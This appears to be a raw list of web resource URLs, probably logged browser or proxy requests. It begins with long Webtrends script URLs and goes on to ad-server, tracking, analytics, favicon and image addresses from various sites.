http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7439f22d3b9a815f9c722cfa485633f72f3f241d638b524ee2040125118e68eec2e1dc6251cb3c98fab04d25ff4b0fc2f4a99237ea729651afc8bd43ab33eb64c3735a7123a51f7c3fe768690b96b249ad8a9dba4b1630dafd95763f5c7cd88bc890992c71f509fcb147ed116d7e39538dcb714780e6528e17939bba6512ca7216825b4107315270a4b13f0bb9decdd2348b35ab7396cc57c0dab72997b533e4cefd6b1541152dd0837194b47ebb97b26ccd99434a9b4de64791e09ff725c36828bedc60270045b0e9a366fe0666763c333a7bf4d6f182de01e870aa4da3ac241ef3580fa887b63707fd1f08760186781c3ce2ba4ff601a680ee4e4085850f15c63808fe61b99fbd4d12244366a38287b3d1c3a63dfca027d4eb8c266b59d931a5912949c1f199b0505949c654a51a33b388b740ca72b85cb2f939d5f629fe8ed20e9af404b7b5768b113fbdfacc9ae56da069ff7ca4456e2ef2f31c7d4f257a6c51e3d613ed342195c996e327a6b94f79a125485519e934a35150c788f8b3bd3da9479dded12c188f4d5bac3136805876946bddd1cc700e208124b7afafecd34f58e50bad6a6de4a8b2c4adee0eac6ecf6c870c37639dfc72aa1cd58be713ced7b64b7b3f311c06085c4daf9ddb9202d2ef71bfb6a577153d406c4fb5876f3d3246c8daf24e4c091d96443ca4a09019c60f58e648a589b2b26504bc301673e38b69ff73d7d5035d2fac884e433eba4bf065941c143d32f3d984247caad289264b8f59f8a2344e686ed123520e0a61f0374e543b2de3a7b4a7c2b53dee03ef39017042d8e70f9dabb4e61fc05b1a78d4eceb27561348e5ca12f7d80ba9b92c56c53923d3d3f0629212075dbd905273501c825ccda6f31ce9e27f9029c01cb14d2a2aa6733302eb3ff57fdedcb4a041311ed28706378ab8e287be3f253f58020441c7b456c8e0d914a966d2aa08da9c763c0507dbceaf6213f21315956753ace6b9d24bb681a9d319d2b5556eab27a5394f676811baf5c1657894edacc6263b19def2927c7c0969c3ede4b531abe2ab22430dc2c51b55488c9e2ec3e023911831418779a9723f6bb5d4b12b6f42cb0dd8b9f842e193f464c788f29e0b9b2face51a36bc39e81c7ca7cc2483bc1c4c2cf51b0754493a6da88d231e07d9b5b6dd1f7afb5c5f313b50ae631e70aabdd13b93a504bf90780dadbbd0c638ad8c461240f162eafb149b7926e6a0a1be122958f23edbcd8b5b496c26cf5cda6a19dbacefb2f687a8b645956a7bbef426f43fc279ddd1ef32bacc859629f98df227570d4b6f91cf00f4ea6e
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1e3b05f9a6f0b729a85efe7adb7fb8cf8eeb771dec2619c6e66228f7e802013802a70bf96b1c3ea19d97efe93fa6fb5ea74b545b1f6369884864c85e279fd5377162ab5cbea2665ceb2710c2aa521889f65cb9f85acd62a48c188452f8d5108fcdb073538598989008ca7f0ba4af4581f6d4a79c2f7c47cdcd7a2552be91b374aea6f476ccb905aa5a3d174e1a634cdb980d9d601c589313678623d87457b45e1f1e908c61532f25e3f94f63afa3f6db67e7007a14a6b7c710a8b5a35e27a0d4500847f80c0ebda463bc83a8189dd1d23b44666c6f0e2e2369b2e8a5dffca9a56c2278975ad05350150d5070b4c817a7105f1cc36df9be0da376750cc8ef217352a0ba380bf9a922864fe1d879913aa3b5d337305caf06e6482e85fb331c3d8ef5b24887216825952132a3d35aff60551fb92a69724812ffe64c7bc44d9cda7109fff75ecdefc7a580b5b015be0a2
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4ecb5eeb972d0fb6d8c27392b8f1fe14354db7a22e4f3f981b902d46ff783e47cf9a720ab7f8ad51ef99c9e5cceaa79b91552041ad9a79a692b84e621103aca09edf9249ed2df83f71d59ccc62356fa5168f2ca0f3f315ffb890f88d686c03ff64f777d5e1bbf9db672ada4c41e75e97a7c7ecc5f7a55ffc64ec4e19639b7820eeab9c3979112afef38467e754391361e4e91e0fc13bf0049e4212e9f91559c63359c257a75a15c6b001172fe4937f705511341db39b094acc560169b6ac1d5ed1752b30b5cd5e8a69d429d698147daacb730cc29fc60d071411a29ce700554cc273d409ac55da6eb9eba491035a7fc9371495675d590c2e2ea0819f20efec52fbc6148654a40d0d5333cdee40bc237d290ef3a55ef0473ee3d3174415824f7e05046e588ffd272df35a074edad59ce95a73fdbfd338a84b97405441e3baacf2880b37eb38bc03b8ec6130e8355f13082f285830ae14702ba6d55
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4f3b2ecaa7b9787268975646c9a6fe12e0dc96b33e5d7f4cfbd4c8b3fb389ac31f4b33b877f9a9e0ab4c5dd1a85e935f84d0f311689f4c87061deb765416dd916a4be71979f8ec8a34c06da9f6274d60a23ad9b1c367b4c85fe0699df97c83df65c6967397bd9edd304b9bcca55469f091879db220e21c48056caf3e341ca810df1dfdb8f8301c58931200004259f201f4ae197f61db2733ce4275be9e72fe1683799230f74c1350a09710efe594ee36a14527ee7039bd0e2c96e0d9d79dacfed1f62fc3c4b92a5f0b96ec20fda11f8dbd256a346ef03c869240646c3700554e268690b9aa736bee58de6154f6dd68f837e5e5476d1fec1e9ec5f73f10cfac52fea671f394a47d58734548db45cc30ad0c0ab24408f351d9809504f3121249a963f2a9ff8cdf343932db86683f208910246bbe0
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dce594e3d0e60b235269895e7baf9502a736d5a84b81ecc7b695dddf3bf515e70b0f61e903d0620220ef995b6766604ecdc6f9cffa4ffef19e7d66baea70381de7df55cf37dbe731091e6cb6a3905f846911248595aff0b1f6f3cdbfe3ac30d9c4678e383536c316f12914894b6effc4f298ac54cb7e8293fd68f6a36780748b8600e6979e42ced92cbc2e742b189ed2de622c89f6711a25da45f7eb77c18d8497be4c1899d26a72dc1268f2931c41435eea87148ad684c83cff5d6d663078d1efc44cf2e303e28add
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29c9119cbec293c0d622b875d417cd18cb343d86f39e9542e91ed43fa6a22e9270074c2457c7a6f7d885f3ef87c0e45039908e9b4e1c61756cf4882f9b44c53e34700d5e8a69d54e50f995fbfbccd42df46ec12c17c571639b3606a4f9a72171192c33eabf899bf391631da8883685e0c3d908399b6b31904b650bd8315aa76147e2553c8915e7d80f265952595abbe344d9a610997284107317e59a3b0425eeb9ba191218221aa6f94bb40dcc1e9249cb774bf98ee7407217244aeec16ffd31ba080c2399fd00053ca13a163a0dea3c21fbe005fb9d10032105be4e1a267f21a6d327c62776a8fd1e687a80aec67ee1af4ed0e54af4f4eeec3f11307fd1f196b76867d6c3ce2cb04a55eb0d1bd080093f61802c730698566b99fbd06410a0371a3c5d0ecb5d4a62a86a51effaadb722705ff70b2911f1e9fe6dfeb180f7bc75bac0f70e8d4f717ae71c849b8fd7885af7cbac98053cfe672a0a206ef123ee1a389dbb537e637b82af0456b58f2f21e694e272e3b17ae8b4dac6e66c088819230b1b87b3bf767190709e232b65522d18aefb0cd28a343dd94806e46d85b59ab2735f94d709363d9d6c3740d2c822da5aeaef9d43f4def09ef3a3ab7f0f79ffffe0ba76ece1f931b46058afc36bc07c392f003d9d7b64b7b3f310816786a06f9cace8e1ec1ee2df9d7b272742c2d6b2f8497730a2341d5d1b5104b6e3cc7060ae8e5dc2b974608f86f949ca5e431439c67403cb3a96ff641869c533250de844f4333b65de07d8c0c6d60369e9283307caad2b3076aa574beba2c5c7877c112480c4a35e22b5c3359409cd1bbabcfb72eed138d2a0a7247d2e40b97a8bcac1fdd5d0578d1f5ea254a1447e6df13f3d309b9f4295cc03c2bd6dce17c9d7b4719e6fd142b3e0a873ca4a4ff739ff9679e39af46f80a30198a0132028a5bef72c9a8aeb75b401dd5937044febef7f5cf4b542529731555c8e1669fbcd66bbd1bb3be6ff0b35e620970dbd8af3e53a64b079e712ebdffab8e1287dfd1a058b7a2076df84ef6381d660411bcf39603779ce8aaad2a610b918f82136c57439bf9ebf439a0eaaa7f400dcfd3024409e7cd7280fb6f8e0944439466b3125200cfb7d03b6145c81982f5b012ec80ec6ab1b7d3ed65ff45ae954d6bbe27fa402ecedc2d9bd8420330ed097839576d2daafe311514b0a1ccc5036e963838572c5ed87b103b8fbdc73b97d004d99e6078b48df5e414fcd9020f0a903cadd733bb526a98e398b2537715cc02e2eaf75c692b7d9951da7333d6b7ebf495d591ac74954c5e98b33eab26d0029628cb
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc873419440ef867fa5712fc8cd9d589f6acaa54857770a79f59f4618f43dadef23cadec93964ed4b1e92d4a0d2076ce9ef36df78c97dfc78977bd6191d8ced1c3fb5760e1e47e4a45c795f13d92fda6a31a2c06cbc8a0c8e2a660ebbf5d623b135ad8ab210b8c645d4f6137873627d59f7fba294317baec039dc250131ca3fbe973a9a77984547c4816041b9c62
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc8734195e13e473e5477f80fae3f4f889c7a853856a70bf995a8208e85de0f4cf1d9dccbaa929d2fcbc646e010a6083c1be46d0eb909292c053b14b8795919ce8dc3067b1bb3d7345cb89da2f89fef0a17b13309a9ef385b98035afeb4a79786d398dba2f4f8e65081d313780362dd1cd7eef7b4646eaea4084d0667e77d299cb65a1b72184547c481603bc57d1
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b682e0afe92d849a36d77c696f9b02f52213c7753c022c538b
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3
http://rad.msn.com/ADSAdClient31.dll
http://rt.disqus.com/forums/realtime-cached.js
http://scripts.chitika.net/static/hq/lifescript.js
https://servicing.capitalone.com/C1/Themes/TopTabMenu/Images/Marketing/Ban_IPOS.gif
https://servicing.capitalone.com/C1/Themes/TopTabMenu/images/header_bg.gif
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://spd.pointroll.com/PointRoll/Ads/PRScript.dll
http://sr2.liveperson.net/hcp/html/mTag.js
http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4
http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4
http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4
http://syn.5min.com/handlers/SenseHandler.ashx
http://trk.etrigue.com/track.php
http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView
http://web2.checkm8.com/adam/detect
http://widgets.klout.com/public/scripts/widget_hover.js
http://wow.curse.com/Themes/Common/CS/images/Common/star-left-off.gif
http://wow.curse.com/Themes/Common/CS/images/Common/star-left-on.gif
http://wow.curse.com/Themes/Common/CS/images/Common/star-right-off.gif
http://wow.curse.com/Themes/Common/CS/images/Common/star-right-on.gif
http://wow.curse.com/adserver/default.aspx
http://www.articleonepartners.com/images/favicon.ico
http://www.articleonepartners.com/images/ipwatchdog.png
http://www.asp.net/omniture/analyticsid.aspx
http://www.betabeat.com/wp-admin/admin-ajax.php
http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php
https://www.capitalone.com/favicon.ico
http://www.codeplex.com/site/analyticsid.aspx
http://www.fiddler2.com/fiddler2/updatecheck.asp
http://www.jackhenry.com/logos/cdd775ef-7b5f-4921-bd1a-c577d8029e28.gif
http://www.jackhenrybanking.com/images/b7cf526e-2e5f-4898-9d62-3bb61fdd6dcf.gif
http://www.nmmlaw.com/favicon.ico
http://www.othersonline.com/favicon.ico
http://www.seashepherd.org/favicon.ico
http://www.silverlight.net/omniture/analyticsid
http://www.silverpop.com/de/images/headers/About_L3.jpg
http://www.silverpop.com/de/images/headers/Clients_L3.jpg
http://www.silverpop.com/de/images/headers/Impressum_L3.jpg
http://www.silverpop.com/de/images/headers/NewsEvents_L3.jpg
http://www.silverpop.com/de/images/headers/PrivacyLegal_L3.jpg
http://www.silverpop.com/de/images/headers/Resources_L3.jpg
http://www.silverpop.com/favicon.ico
http://www.silverpop.com/global/dropmenu/settings.js
http://www.silverpop.com/images/headers/Clients_L3.jpg
http://www.silverpop.com/images/headers/NewsEvents_L3.jpg
http://www.silverpop.com/images/headers/Partners_L3.jpg
http://www.silverpop.com/images/headers/Preferences_L3.jpg
http://www.silverpop.com/images/headers/PrivacyLegal_L3.jpg
http://www.silverpop.com/images/headers/Resources_L3.jpg
http://www.silverpop.com/images/headers/Services_L3.jpg
